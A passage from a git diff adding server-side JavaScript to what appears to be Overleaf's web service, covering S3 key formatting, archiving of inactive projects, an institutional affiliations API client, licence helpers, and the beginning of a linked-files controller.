promises: RestoreManager } diff --git a/services/web/app/src/Features/History/project_key.js b/services/web/app/src/Features/History/project_key.js new file mode 100644 index 0000000..a4722db --- /dev/null +++ b/services/web/app/src/Features/History/project_key.js @@ -0,0 +1,24 @@ +// Keep in sync with services/history-v1/storage/lib/project_key.js +const _ = require('lodash') +const path = require('node:path') + +// +// The advice in http://docs.aws.amazon.com/AmazonS3/latest/dev/ +// request-rate-perf-considerations.html is to avoid sequential key prefixes, +// so we reverse the project ID part of the key as they suggest. +// +function format(projectId) { + const prefix = naiveReverse(pad(projectId)) + return path.join(prefix.slice(0, 3), prefix.slice(3, 6), prefix.slice(6)) +} + +function pad(number) { + return _.padStart(number, 9, '0') +} + +function naiveReverse(string) { + return string.split('').reverse().join('') +} + +exports.format = format +exports.pad = pad diff --git a/services/web/app/src/Features/InactiveData/InactiveProjectController.mjs b/services/web/app/src/Features/InactiveData/InactiveProjectController.mjs new file mode 100644 index 0000000..2e41e80 --- /dev/null +++ b/services/web/app/src/Features/InactiveData/InactiveProjectController.mjs @@ -0,0 +1,44 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
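+// Request sketch (illustrative JSON body; the values 10 and 360 mirror the
+// defaults applied in InactiveProjectManager.deactivateOldProjects):
+//   { "numberOfProjectsToArchive": 10, "ageOfProjects": 360 }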
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import InactiveProjectManager from './InactiveProjectManager.js' + +export default { + deactivateOldProjects(req, res) { + const numberOfProjectsToArchive = parseInt( + req.body.numberOfProjectsToArchive, + 10 + ) + const { ageOfProjects } = req.body + return InactiveProjectManager.deactivateOldProjects( + numberOfProjectsToArchive, + ageOfProjects, + function (err, projectsDeactivated) { + if (err != null) { + return res.sendStatus(500) + } else { + return res.json(projectsDeactivated) + } + } + ) + }, + + deactivateProject(req, res) { + const { project_id: projectId } = req.params + return InactiveProjectManager.deactivateProject(projectId, function (err) { + if (err != null) { + return res.sendStatus(500) + } else { + return res.sendStatus(200) + } + }) + }, +} diff --git a/services/web/app/src/Features/InactiveData/InactiveProjectManager.js b/services/web/app/src/Features/InactiveData/InactiveProjectManager.js new file mode 100644 index 0000000..818fe70 --- /dev/null +++ b/services/web/app/src/Features/InactiveData/InactiveProjectManager.js @@ -0,0 +1,129 @@ +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const DocstoreManager = require('../Docstore/DocstoreManager') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectUpdateHandler = require('../Project/ProjectUpdateHandler') +const { Project } = require('../../models/Project') +const Modules = require('../../infrastructure/Modules') +const { READ_PREFERENCE_SECONDARY } = require('../../infrastructure/mongodb') +const { callbackifyAll } = require('@overleaf/promise-utils') +const Metrics = require('@overleaf/metrics') + +const MILISECONDS_IN_DAY = 86400000 +const InactiveProjectManager = { + async reactivateProjectIfRequired(projectId) { + let project + try { + project = await ProjectGetter.promises.getProject(projectId, { + active: true, + }) + } catch (err) { + OError.tag(err, 'error getting project', { + project_id: projectId, + }) + throw err + } + + logger.debug( + { projectId, active: project.active }, + 'seeing if need to reactivate project' + ) + + if (project.active) { + return + } + + try { + await DocstoreManager.promises.unarchiveProject(projectId) + } catch (err) { + OError.tag(err, 'error reactivating project in docstore', { + project_id: projectId, + }) + throw err + } + + await ProjectUpdateHandler.promises.markAsActive(projectId) + }, + + async deactivateOldProjects(limit, daysOld) { + if (limit == null) { + limit = 10 + } + if (daysOld == null) { + daysOld = 360 + } + const oldProjectDate = new Date() - MILISECONDS_IN_DAY * daysOld + + let projects + try { + // use $not $gt to catch non-opened projects where lastOpened is null + projects = await Project.find({ + lastOpened: { $not: { $gt: oldProjectDate } }, + }) + .where('active') + .equals(true) + .select('_id') + .limit(limit) + .read(READ_PREFERENCE_SECONDARY) + .exec() + } catch (err) { + logger.err({ err }, 'could not get projects for deactivating') + } + + logger.debug( + { numberOfProjects: projects && projects.length }, + 'deactivating projects' + ) + + for (const project of projects) { + try { + await InactiveProjectManager.deactivateProject(project._id) + } 
catch (err) { + logger.err( + { projectId: project._id, err }, + 'unable to deactivate project' + ) + } + } + + return projects + }, + + async deactivateProject(projectId) { + logger.debug({ projectId }, 'deactivating inactive project') + + // ensure project is removed from document updater (also flushes updates to history) + try { + await DocumentUpdaterHandler.promises.flushProjectToMongoAndDelete( + projectId + ) + } catch (err) { + logger.warn( + { err, projectId }, + 'error flushing project to mongo when archiving' + ) + Metrics.inc('inactive-project', 1, { + method: 'archive', + status: 'flush-error', + }) + throw err + } + + await Modules.promises.hooks.fire('deactivateProject', projectId) + + // now archive the project and mark it as inactive + try { + await DocstoreManager.promises.archiveProject(projectId) + await ProjectUpdateHandler.promises.markAsInactive(projectId) + } catch (err) { + logger.warn({ err, projectId }, 'error deactivating project') + throw err + } + }, +} + +module.exports = { + ...callbackifyAll(InactiveProjectManager), + promises: InactiveProjectManager, +} diff --git a/services/web/app/src/Features/Institutions/InstitutionsAPI.js b/services/web/app/src/Features/Institutions/InstitutionsAPI.js new file mode 100644 index 0000000..bdb575c --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsAPI.js @@ -0,0 +1,389 @@ +const { callbackify } = require('util') +const OError = require('@overleaf/o-error') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const request = require('requestretry') +const { promisifyAll } = require('@overleaf/promise-utils') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const { + V1ConnectionError, + InvalidInstitutionalEmailError, +} = require('../Errors/Errors') +const { fetchJson, fetchNothing } = require('@overleaf/fetch-utils') + +function _makeRequestOptions(options) { + const requestOptions = { + method: options.method, + basicAuth: { user: settings.apis.v1.user, password: settings.apis.v1.pass }, + signal: AbortSignal.timeout(settings.apis.v1.timeout), + } + + if (options.body) { + requestOptions.json = options.body + } + + return requestOptions +} + +function _responseErrorHandling(options, error) { + const status = error.response.status + + if (status >= 500) { + throw new V1ConnectionError({ + message: 'error getting affiliations from v1', + info: { + status, + body: error.body, + }, + }) + } + + let errorBody + + try { + if (error.body) { + errorBody = JSON.parse(error.body) + } + } catch (e) {} + + let errorMessage + if (errorBody?.errors) { + errorMessage = `${status}: ${errorBody.errors}` + } else { + errorMessage = `${options.defaultErrorMessage}: ${status}` + } + + throw new OError(errorMessage, { status }) +} + +async function _affiliationRequestFetchJson(options) { + if (!settings.apis.v1.url) { + return + } // service is not configured + + const url = `${settings.apis.v1.url}${options.path}` + + const requestOptions = _makeRequestOptions(options) + + try { + return await fetchJson(url, requestOptions) + } catch (error) { + _responseErrorHandling(options, error) + } +} + +async function _affiliationRequestFetchNothing(options) { + if (!settings.apis.v1.url) { + return + } // service is not configured + + const url = `${settings.apis.v1.url}${options.path}` + + const requestOptions = _makeRequestOptions(options) + + try { + await fetchNothing(url, requestOptions) + } catch (error) { + _responseErrorHandling(options, error) + 
} +} + +async function _affiliationRequestFetchNothing404Ok(options) { + try { + await _affiliationRequestFetchNothing(options) + } catch (error) { + const status = error.info?.status + if (status !== 404) { + throw error + } + } +} + +function getInstitutionAffiliations(institutionId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/${institutionId.toString()}/affiliations`, + defaultErrorMessage: "Couldn't get institution affiliations", + }, + (error, body) => callback(error, body || []) + ) +} + +function getConfirmedInstitutionAffiliations(institutionId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/${institutionId.toString()}/confirmed_affiliations`, + defaultErrorMessage: "Couldn't get institution affiliations", + }, + (error, body) => callback(error, body || []) + ) +} + +function getInstitutionAffiliationsCounts(institutionId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/${institutionId.toString()}/affiliations_counts`, + defaultErrorMessage: "Couldn't get institution counts", + }, + (error, body) => callback(error, body || []) + ) +} + +function getLicencesForAnalytics(lag, queryDate, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/institutions/institutions_licences`, + body: { query_date: queryDate, lag }, + defaultErrorMessage: 'Could not get institutions licences', + }, + callback + ) +} + +function getUserAffiliations(userId, callback) { + makeAffiliationRequest( + { + method: 'GET', + path: `/api/v2/users/${userId.toString()}/affiliations`, + defaultErrorMessage: "Couldn't get user affiliations", + }, + (error, body) => callback(error, body || []) + ) +} + +async function getUsersNeedingReconfirmationsLapsedProcessed() { + return await _affiliationRequestFetchJson({ + method: 'GET', + path: '/api/v2/institutions/need_reconfirmation_lapsed_processed', + defaultErrorMessage: + 'Could not get users that need reconfirmations lapsed processed', + }) +} + +async function addAffiliation(userId, email, affiliationOptions) { + const { + university, + department, + role, + confirmedAt, + entitlement, + rejectIfBlocklisted, + } = affiliationOptions + + try { + await _affiliationRequestFetchNothing({ + method: 'POST', + path: `/api/v2/users/${userId.toString()}/affiliations`, + body: { + email, + university, + department, + role, + confirmedAt, + entitlement, + rejectIfBlocklisted, + }, + defaultErrorMessage: "Couldn't create affiliation", + }) + } catch (error) { + if (error.info?.status === 422) { + throw new InvalidInstitutionalEmailError(error.message).withCause(error) + } + throw error + } + + if (!university) { + return + } + + // have notifications delete any ip matcher notifications for this university + try { + await NotificationsBuilder.promises + .ipMatcherAffiliation(userId) + .read(university.id) + } catch (err) { + // log and ignore error + logger.err({ err }, 'Something went wrong marking ip notifications read') + } +} + +async function removeAffiliation(userId, email) { + await _affiliationRequestFetchNothing404Ok({ + method: 'POST', + path: `/api/v2/users/${userId.toString()}/affiliations/remove`, + body: { email }, + defaultErrorMessage: "Couldn't remove affiliation", + }) +} + +function endorseAffiliation(userId, email, role, department, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: `/api/v2/users/${userId.toString()}/affiliations/endorse`, + body: { email, role, department }, + 
defaultErrorMessage: "Couldn't endorse affiliation", + }, + callback + ) +} + +function deleteAffiliations(userId, callback) { + makeAffiliationRequest( + { + method: 'DELETE', + path: `/api/v2/users/${userId.toString()}/affiliations`, + defaultErrorMessage: "Couldn't delete affiliations", + }, + callback + ) +} + +function addEntitlement(userId, email, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: `/api/v2/users/${userId}/affiliations/add_entitlement`, + body: { email }, + defaultErrorMessage: "Couldn't add entitlement", + }, + callback + ) +} + +function removeEntitlement(userId, email, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: `/api/v2/users/${userId}/affiliations/remove_entitlement`, + body: { email }, + defaultErrorMessage: "Couldn't remove entitlement", + extraSuccessStatusCodes: [404], + }, + callback + ) +} + +function sendUsersWithReconfirmationsLapsedProcessed(users, callback) { + makeAffiliationRequest( + { + method: 'POST', + path: '/api/v2/institutions/reconfirmation_lapsed_processed', + body: { users }, + defaultErrorMessage: + 'Could not update reconfirmation_lapsed_processed_at', + }, + (error, body) => callback(error, body || []) + ) +} + +const InstitutionsAPI = { + getInstitutionAffiliations, + + getConfirmedInstitutionAffiliations, + + getInstitutionAffiliationsCounts, + + getLicencesForAnalytics, + + getUserAffiliations, + + getUsersNeedingReconfirmationsLapsedProcessed: callbackify( + getUsersNeedingReconfirmationsLapsedProcessed + ), + + addAffiliation: callbackify(addAffiliation), + + removeAffiliation: callbackify(removeAffiliation), + + endorseAffiliation, + + deleteAffiliations, + + addEntitlement, + + removeEntitlement, + + sendUsersWithReconfirmationsLapsedProcessed, +} + +function makeAffiliationRequest(options, callback) { + if (!settings.apis.v1.url) { + return callback(null) + } // service is not configured + if (!options.extraSuccessStatusCodes) { + options.extraSuccessStatusCodes = [] + } + const requestOptions = { + method: options.method, + url: `${settings.apis.v1.url}${options.path}`, + body: options.body, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + json: true, + timeout: settings.apis.v1.timeout, + } + if (options.method === 'GET') { + requestOptions.maxAttempts = 3 + requestOptions.retryDelay = 500 + } else { + requestOptions.maxAttempts = 0 + } + request(requestOptions, function (error, response, body) { + if (error) { + return callback( + new V1ConnectionError('error getting affiliations from v1').withCause( + error + ) + ) + } + if (response && response.statusCode >= 500) { + return callback( + new V1ConnectionError({ + message: 'error getting affiliations from v1', + info: { + status: response.statusCode, + body, + }, + }) + ) + } + let isSuccess = response.statusCode >= 200 && response.statusCode < 300 + if (!isSuccess) { + isSuccess = options.extraSuccessStatusCodes.includes(response.statusCode) + } + if (!isSuccess) { + let errorMessage + if (body && body.errors) { + errorMessage = `${response.statusCode}: ${body.errors}` + } else { + errorMessage = `${options.defaultErrorMessage}: ${response.statusCode}` + } + + logger.warn({ path: options.path, body: options.body }, errorMessage) + return callback( + new OError(errorMessage, { statusCode: response.statusCode }) + ) + } + + callback(null, body) + }) +} + +InstitutionsAPI.promises = promisifyAll(InstitutionsAPI, { + without: [ + 'addAffiliation', + 'removeAffiliation', + 
'getUsersNeedingReconfirmationsLapsedProcessed', + ], +}) + +InstitutionsAPI.promises.addAffiliation = addAffiliation +InstitutionsAPI.promises.removeAffiliation = removeAffiliation +InstitutionsAPI.promises.getUsersNeedingReconfirmationsLapsedProcessed = + getUsersNeedingReconfirmationsLapsedProcessed + +module.exports = InstitutionsAPI diff --git a/services/web/app/src/Features/Institutions/InstitutionsFeatures.js b/services/web/app/src/Features/Institutions/InstitutionsFeatures.js new file mode 100644 index 0000000..0b33fe1 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsFeatures.js @@ -0,0 +1,32 @@ +const { callbackifyAll } = require('@overleaf/promise-utils') +const UserGetter = require('../User/UserGetter') +const PlansLocator = require('../Subscription/PlansLocator') +const Settings = require('@overleaf/settings') + +async function getInstitutionsFeatures(userId) { + const planCode = await getInstitutionsPlan(userId) + const plan = planCode && PlansLocator.findLocalPlanInSettings(planCode) + const features = plan && plan.features + return features || {} +} + +async function getInstitutionsPlan(userId) { + if (await hasLicence(userId)) { + return Settings.institutionPlanCode + } + return null +} + +async function hasLicence(userId) { + const emailsData = await UserGetter.promises.getUserFullEmails(userId) + return emailsData.some(emailData => emailData.emailHasInstitutionLicence) +} +const InstitutionsFeatures = { + getInstitutionsFeatures, + getInstitutionsPlan, + hasLicence, +} +module.exports = { + promises: InstitutionsFeatures, + ...callbackifyAll(InstitutionsFeatures), +} diff --git a/services/web/app/src/Features/Institutions/InstitutionsGetter.js b/services/web/app/src/Features/Institutions/InstitutionsGetter.js new file mode 100644 index 0000000..7b6ef48 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsGetter.js @@ -0,0 +1,101 @@ +const { promisify, callbackify } = require('util') +const UserGetter = require('../User/UserGetter') +const UserMembershipsHandler = require('../UserMembership/UserMembershipsHandler') +const UserMembershipEntityConfigs = require('../UserMembership/UserMembershipEntityConfigs') + +async function getCurrentAffiliations(userId) { + const fullEmails = await UserGetter.promises.getUserFullEmails(userId) + // current are those confirmed and not with lapsed reconfirmations + return fullEmails + .filter( + emailData => + emailData.confirmedAt && + emailData.affiliation && + emailData.affiliation.institution && + emailData.affiliation.institution.confirmed && + !emailData.affiliation.pastReconfirmDate + ) + .map(emailData => emailData.affiliation) +} + +async function getCurrentAndPastAffiliationIds(userId) { + let fullEmails = await UserGetter.promises.getUserFullEmails(userId) + // current are those confirmed and not with lapsed reconfirmations + fullEmails = fullEmails + .filter( + emailData => + emailData.confirmedAt && emailData.affiliation?.institution?.confirmed + ) + .map(emailData => emailData.affiliation.institution.id) + // remove dupes + return [...new Set(fullEmails)] +} + +async function getCurrentInstitutionIds(userId) { + // current are those confirmed and not with lapsed reconfirmations + // only 1 record returned per current institutionId + const institutionIds = new Set() + const currentAffiliations = await getCurrentAffiliations(userId) + currentAffiliations.forEach(affiliation => { + institutionIds.add(affiliation.institution.id) + }) + return [...institutionIds] +} + +async function 
getCurrentInstitutionsWithLicence(userId) { + // current are those confirmed and not with lapsed reconfirmations + // only 1 record returned per current institution + const institutions = {} + const currentAffiliations = await getCurrentAffiliations(userId) + currentAffiliations.forEach(affiliation => { + if (affiliation.licence && affiliation.licence !== 'free') { + institutions[affiliation.institution.id] = affiliation.institution + } + }) + return Object.values(institutions) +} + +const InstitutionsGetter = { + getConfirmedAffiliations(userId, callback) { + UserGetter.getUserFullEmails(userId, function (error, emailsData) { + if (error) { + return callback(error) + } + + const confirmedAffiliations = emailsData + .filter( + emailData => + emailData.confirmedAt && + emailData.affiliation && + emailData.affiliation.institution && + emailData.affiliation.institution.confirmed + ) + .map(emailData => emailData.affiliation) + + callback(null, confirmedAffiliations) + }) + }, + + getCurrentInstitutionIds: callbackify(getCurrentInstitutionIds), + getCurrentInstitutionsWithLicence: callbackify( + getCurrentInstitutionsWithLicence + ), + + getManagedInstitutions(userId, callback) { + UserMembershipsHandler.getEntitiesByUser( + UserMembershipEntityConfigs.institution, + userId, + callback + ) + }, +} + +InstitutionsGetter.promises = { + getCurrentAffiliations, + getCurrentInstitutionIds, + getCurrentInstitutionsWithLicence, + getCurrentAndPastAffiliationIds, + getManagedInstitutions: promisify(InstitutionsGetter.getManagedInstitutions), +} + +module.exports = InstitutionsGetter diff --git a/services/web/app/src/Features/Institutions/InstitutionsHelper.js b/services/web/app/src/Features/Institutions/InstitutionsHelper.js new file mode 100644 index 0000000..c4cb486 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsHelper.js @@ -0,0 +1,28 @@ +function emailHasLicence(emailData) { + if (!emailData.confirmedAt) { + return false + } + if (!emailData.affiliation) { + return false + } + const affiliation = emailData.affiliation + const institution = affiliation.institution + if (!institution) { + return false + } + if (!institution.confirmed) { + return false + } + if (!affiliation.licence) { + return false + } + if (affiliation.pastReconfirmDate) { + return false + } + + return affiliation.licence !== 'free' +} + +module.exports = { + emailHasLicence, +} diff --git a/services/web/app/src/Features/Institutions/InstitutionsManager.js b/services/web/app/src/Features/Institutions/InstitutionsManager.js new file mode 100644 index 0000000..6acf078 --- /dev/null +++ b/services/web/app/src/Features/Institutions/InstitutionsManager.js @@ -0,0 +1,361 @@ +const { + callbackifyAll, + promiseMapWithLimit, +} = require('@overleaf/promise-utils') +const { ObjectId } = require('mongodb-legacy') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const { fetchJson } = require('@overleaf/fetch-utils') +const InstitutionsAPI = require('./InstitutionsAPI') +const FeaturesUpdater = require('../Subscription/FeaturesUpdater') +const FeaturesHelper = require('../Subscription/FeaturesHelper') +const UserGetter = require('../User/UserGetter') +const NotificationsBuilder = require('../Notifications/NotificationsBuilder') +const NotificationsHandler = require('../Notifications/NotificationsHandler') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const { Institution } = require('../../models/Institution') +const { Subscription } = 
require('../../models/Subscription')
+const OError = require('@overleaf/o-error')
+
+const ASYNC_LIMIT = parseInt(process.env.ASYNC_LIMIT, 10) || 5
+
+async function _getSsoUsers(institutionId, lapsedUserIds) {
+  let currentNotEntitledCount = 0
+  const ssoNonEntitledUsersIds = []
+  const allSsoUsersByIds = {}
+
+  const allSsoUsers = await UserGetter.promises.getSsoUsersAtInstitution(
+    institutionId,
+    { samlIdentifiers: 1 }
+  )
+  allSsoUsers.forEach(user => {
+    allSsoUsersByIds[user._id] = user.samlIdentifiers.find(
+      identifier => identifier.providerId === institutionId.toString()
+    )
+  })
+  for (const userId in allSsoUsersByIds) {
+    if (!allSsoUsersByIds[userId].hasEntitlement) {
+      ssoNonEntitledUsersIds.push(userId)
+    }
+  }
+  if (ssoNonEntitledUsersIds.length > 0) {
+    currentNotEntitledCount = ssoNonEntitledUsersIds.filter(
+      id => !lapsedUserIds.includes(id)
+    ).length
+  }
+
+  return {
+    allSsoUsers,
+    allSsoUsersByIds,
+    currentNotEntitledCount,
+  }
+}
+
+async function _checkUsersFeatures(userIds) {
+  const users = await UserGetter.promises.getUsers(userIds, { features: 1 })
+  const result = {
+    proUserIds: [],
+    nonProUserIds: [],
+  }
+
+  users.forEach(user => {
+    const hasProFeaturesOrBetter = FeaturesHelper.isFeatureSetBetter(
+      user.features,
+      Settings.features.professional
+    )
+
+    if (hasProFeaturesOrBetter) {
+      result.proUserIds.push(user._id)
+    } else {
+      result.nonProUserIds.push(user._id)
+    }
+  })
+
+  return result
+}
+
+const InstitutionsManager = {
+  async clearInstitutionNotifications(institutionId, dryRun) {
+    async function clear(key) {
+      const run = dryRun
+        ? NotificationsHandler.promises.previewMarkAsReadByKeyOnlyBulk
+        : NotificationsHandler.promises.markAsReadByKeyOnlyBulk
+
+      return await run(key)
+    }
+
+    const ipMatcherAffiliation = await clear(
+      `ip-matched-affiliation-${institutionId}`
+    )
+    const featuresUpgradedByAffiliation = await clear(
+      `features-updated-by=${institutionId}`
+    )
+    const redundantPersonalSubscription = await clear(
+      `redundant-personal-subscription-${institutionId}`
+    )
+
+    return {
+      ipMatcherAffiliation,
+      featuresUpgradedByAffiliation,
+      redundantPersonalSubscription,
+    }
+  },
+
+  async refreshInstitutionUsers(institutionId, notify) {
+    const refreshFunction = notify ? refreshFeaturesAndNotify : refreshFeatures
+
+    const { institution, affiliations } =
+      await fetchInstitutionAndAffiliations(institutionId)
+
+    for (const affiliation of affiliations) {
+      affiliation.institutionName = institution.name
+      affiliation.institutionId = institutionId
+    }
+
+    await promiseMapWithLimit(ASYNC_LIMIT, affiliations, refreshFunction)
+  },
+
+  async checkInstitutionUsers(institutionId, emitNonProUserIds) {
+    /*
+    v1 has affiliation data. Via getInstitutionAffiliationsCounts, v1 will send
+    lapsed_user_ids, which includes all user types
+    (not linked, linked and entitled, linked not entitled).
+    However, for SSO institutions, it does not know which email is linked
+    to SSO when the license is non-trivial.
Here we need to split that + lapsed count into SSO (entitled and not) or just email users + */ + + const result = { + emailUsers: { + total: 0, // v1 all users - v2 all SSO users + current: 0, // v1 current - v1 SSO entitled - (v2 calculated not entitled current) + lapsed: 0, // v1 lapsed user IDs that are not in v2 SSO users + pro: { + current: 0, + lapsed: 0, + }, + nonPro: { + current: 0, + lapsed: 0, + }, + }, + ssoUsers: { + total: 0, // only v2 + current: { + entitled: 0, // only v1 + notEntitled: 0, // v2 non-entitled SSO users - v1 lapsed user IDs + }, + lapsed: 0, // v2 SSO users that are in v1 lapsed user IDs + pro: { + current: 0, + lapsed: 0, + }, + nonPro: { + current: 0, + lapsed: 0, + }, + }, + } + + const { + user_ids: userIds, // confirmed and not removed users. Includes users with lapsed reconfirmations + current_users_count: currentUsersCount, // all users not with lapsed reconfirmations + lapsed_user_ids: lapsedUserIds, // includes all user types that did not reconfirm (sso entitled, sso not entitled, email only) + with_confirmed_email: withConfirmedEmail, // same count as affiliation metrics + entitled_via_sso: entitled, // same count as affiliation metrics + } = await InstitutionsAPI.promises.getInstitutionAffiliationsCounts( + institutionId + ) + result.ssoUsers.current.entitled = entitled + + const { allSsoUsers, allSsoUsersByIds, currentNotEntitledCount } = + await _getSsoUsers(institutionId, lapsedUserIds) + result.ssoUsers.total = allSsoUsers.length + result.ssoUsers.current.notEntitled = currentNotEntitledCount + + // check if lapsed user ID an SSO user + const lapsedUsersByIds = {} + lapsedUserIds.forEach(id => { + lapsedUsersByIds[id] = true // create a map for more performant lookups + if (allSsoUsersByIds[id]) { + ++result.ssoUsers.lapsed + } else { + ++result.emailUsers.lapsed + } + }) + + result.emailUsers.current = + currentUsersCount - entitled - result.ssoUsers.current.notEntitled + result.emailUsers.total = userIds.length - allSsoUsers.length + + // compare v1 and v2 counts. + if ( + result.ssoUsers.current.notEntitled + result.emailUsers.current !== + withConfirmedEmail + ) { + result.databaseMismatch = { + withConfirmedEmail: { + v1: withConfirmedEmail, + v2: result.ssoUsers.current.notEntitled + result.emailUsers.current, + }, + } + } + + // Add Pro/NonPro status for users + // NOTE: Users not entitled via institution could have Pro via another method + const { proUserIds, nonProUserIds } = await _checkUsersFeatures(userIds) + proUserIds.forEach(id => { + const userType = lapsedUsersByIds[id] ? 'lapsed' : 'current' + if (allSsoUsersByIds[id]) { + result.ssoUsers.pro[userType]++ + } else { + result.emailUsers.pro[userType]++ + } + }) + nonProUserIds.forEach(id => { + const userType = lapsedUsersByIds[id] ? 
'lapsed' : 'current' + if (allSsoUsersByIds[id]) { + result.ssoUsers.nonPro[userType]++ + } else { + result.emailUsers.nonPro[userType]++ + } + }) + if (emitNonProUserIds) { + result.nonProUserIds = nonProUserIds + } + return result + }, + + async getInstitutionUsersSubscriptions(institutionId) { + const affiliations = + await InstitutionsAPI.promises.getInstitutionAffiliations(institutionId) + + const userIds = affiliations.map( + affiliation => new ObjectId(affiliation.user_id) + ) + return await Subscription.find({ admin_id: userIds }) + .populate('admin_id', 'email') + .exec() + }, + + async affiliateUsers(hostname) { + const reversedHostname = hostname.trim().split('').reverse().join('') + + let users + try { + users = await UserGetter.promises.getInstitutionUsersByHostname(hostname) + } catch (error) { + OError.tag(error, 'problem fetching users by hostname') + throw error + } + + await promiseMapWithLimit(ASYNC_LIMIT, users, user => + affiliateUserByReversedHostname(user, reversedHostname) + ) + }, + + async fetchV1Data(institution) { + const url = `${Settings.apis.v1.url}/universities/list/${institution.v1Id}` + try { + const data = await fetchJson(url, { + signal: AbortSignal.timeout(Settings.apis.v1.timeout), + }) + + institution.name = data?.name + institution.countryCode = data?.country_code + institution.departments = data?.departments + institution.portalSlug = data?.portal_slug + institution.enterpriseCommons = data?.enterprise_commons + } catch (error) { + logger.err( + { model: 'Institution', v1Id: institution.v1Id, error }, + '[fetchV1DataError]' + ) + } + }, +} + +const fetchInstitutionAndAffiliations = async institutionId => { + let institution = await Institution.findOne({ v1Id: institutionId }).exec() + institution = await institution.fetchV1DataPromise() + + const affiliations = + await InstitutionsAPI.promises.getConfirmedInstitutionAffiliations( + institutionId + ) + + return { institution, affiliations } +} + +async function refreshFeatures(affiliation) { + const userId = new ObjectId(affiliation.user_id) + return await FeaturesUpdater.promises.refreshFeatures( + userId, + 'refresh-institution-users' + ) +} + +async function refreshFeaturesAndNotify(affiliation) { + const userId = new ObjectId(affiliation.user_id) + const { featuresChanged } = await FeaturesUpdater.promises.refreshFeatures( + userId, + 'refresh-institution-users' + ) + const { user, subscription } = await getUserInfo(userId) + return await notifyUser(user, affiliation, subscription, featuresChanged) +} + +const getUserInfo = async userId => { + const user = await UserGetter.promises.getUser(userId, { _id: 1 }) + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(user) + return { user, subscription } +} + +const notifyUser = async (user, affiliation, subscription, featuresChanged) => { + return await Promise.all([ + (async () => { + if (featuresChanged) { + return await NotificationsBuilder.promises + .featuresUpgradedByAffiliation(affiliation, user) + .create() + } + })(), + (async () => { + if (subscription && !subscription.groupPlan) { + return await NotificationsBuilder.promises + .redundantPersonalSubscription(affiliation, user) + .create() + } + })(), + ]) +} + +async function affiliateUserByReversedHostname(user, reversedHostname) { + const matchingEmails = user.emails.filter( + email => email.reversedHostname === reversedHostname + ) + + for (const email of matchingEmails) { + try { + await InstitutionsAPI.promises.addAffiliation(user._id, email.email, { + 
confirmedAt: email.confirmedAt, + entitlement: + email.samlIdentifier && email.samlIdentifier.hasEntitlement, + }) + } catch (error) { + OError.tag(error, 'problem adding affiliation while confirming hostname') + throw error + } + } + + await FeaturesUpdater.promises.refreshFeatures( + user._id, + 'affiliate-user-by-reversed-hostname' + ) +} + +module.exports = { + ...callbackifyAll(InstitutionsManager), + promises: InstitutionsManager, +} diff --git a/services/web/app/src/Features/LinkedFiles/LinkedFilesController.mjs b/services/web/app/src/Features/LinkedFiles/LinkedFilesController.mjs new file mode 100644 index 0000000..b6ddf81 --- /dev/null +++ b/services/web/app/src/Features/LinkedFiles/LinkedFilesController.mjs @@ -0,0 +1,271 @@ +/* eslint-disable + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import SessionManager from '../Authentication/SessionManager.js' +import Settings from '@overleaf/settings' +import _ from 'lodash' +import AnalyticsManager from '../../../../app/src/Features/Analytics/AnalyticsManager.js' +import LinkedFilesHandler from './LinkedFilesHandler.js' +import { + CompileFailedError, + UrlFetchFailedError, + InvalidUrlError, + AccessDeniedError, + BadEntityTypeError, + BadDataError, + ProjectNotFoundError, + V1ProjectNotFoundError, + SourceFileNotFoundError, + NotOriginalImporterError, + FeatureNotAvailableError, + RemoteServiceError, + FileCannotRefreshError, +} from './LinkedFilesErrors.js' +import { + OutputFileFetchFailedError, + FileTooLargeError, + OError, +} from '../Errors/Errors.js' +import Modules from '../../infrastructure/Modules.js' +import { plainTextResponse } from '../../infrastructure/Response.js' +import ReferencesHandler from '../References/ReferencesHandler.mjs' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import { expressify } from '@overleaf/promise-utils' +import ProjectOutputFileAgent from './ProjectOutputFileAgent.mjs' +import ProjectFileAgent from './ProjectFileAgent.js' +import UrlAgent from './UrlAgent.mjs' + +let LinkedFilesController + +async function createLinkedFile(req, res, next) { + const { project_id: projectId } = req.params + const { name, provider, data, parent_folder_id: parentFolderId } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + + const Agent = await LinkedFilesController._getAgent(provider) + if (Agent == null) { + return res.sendStatus(400) + } + + data.provider = provider + data.importedAt = new Date().toISOString() + + try { + const newFileId = await Agent.promises.createLinkedFile( + projectId, + data, + name, + parentFolderId, + userId + ) + if (name.endsWith('.bib')) { + AnalyticsManager.recordEventForUserInBackground( + userId, + 'linked-bib-file', + { + integration: provider, + } + ) + } + return res.json({ new_file_id: newFileId }) + } catch (err) { + return 